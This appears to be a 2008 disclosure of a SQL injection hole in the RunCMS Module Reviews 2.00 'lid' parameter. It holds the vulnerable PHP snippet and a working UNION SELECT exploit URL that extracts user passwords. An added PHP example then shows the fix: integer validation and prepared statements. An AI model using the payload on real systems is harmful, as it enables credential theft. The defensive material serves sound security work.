
30.04.2008, 21:27
RunCMS Module Reviews 2.00 (lid) Remote SQL Injection Vulnerability
Vuln code:
PHP code:
.....
global $xoopsConfig, $db, $HTTP_POST_VARS, $myts, $eh;
$lid = $HTTP_POST_VARS['lid'];
$title = $HTTP_POST_VARS['title'];
.....
Exploit:
Code:
/modules/myReviews/reviewbook.php?lid=-999991+union+select+pass+from+runcms_users
ZAMUT (c)
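
A hardened handling of the `lid` parameter, as an added example that is not part of the original post and not RunCMS code: the value is accepted only as a positive integer and is then bound to a prepared statement instead of being placed in the SQL text. The `reviews` table, its columns, and the helper names `parse_lid` and `find_review` are assumptions, since the post does not show the module's query.

```php
<?php
// Added example, not RunCMS code. Table, column and function names are hypothetical.

/** Accept only a positive integer for `lid`; anything else yields null. */
function parse_lid($raw): ?int
{
    if (!is_string($raw)) {
        return null; // arrays (lid[]=...) or a missing parameter
    }
    $lid = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $lid === false ? null : $lid;
}

/** Look up a review by id with a bound parameter, so the value never becomes SQL text. */
function find_review(PDO $pdo, int $lid): ?array
{
    $stmt = $pdo->prepare('SELECT lid, title FROM reviews WHERE lid = :lid');
    $stmt->bindValue(':lid', $lid, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed demo data in an in-memory SQLite database (requires pdo_sqlite).
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE reviews (lid INTEGER PRIMARY KEY, title TEXT)');
$pdo->exec("INSERT INTO reviews (lid, title) VALUES (1, 'Sample review')");

// Constructed inputs; the third is the URL-decoded `lid` value from the request in the post.
$inputs = ['1', '42', '-999991 union select pass from runcms_users', '1 OR 1=1', ['1'], null];

foreach ($inputs as $raw) {
    $lid = parse_lid($raw);
    if ($lid === null) {
        // Non-integer input never reaches the database layer.
        echo 'rejected: ' . json_encode($raw) . PHP_EOL;
        continue;
    }
    $row = find_review($pdo, $lid);
    echo "lid=$lid => " . ($row === null ? 'no such review' : $row['title']) . PHP_EOL;
}
```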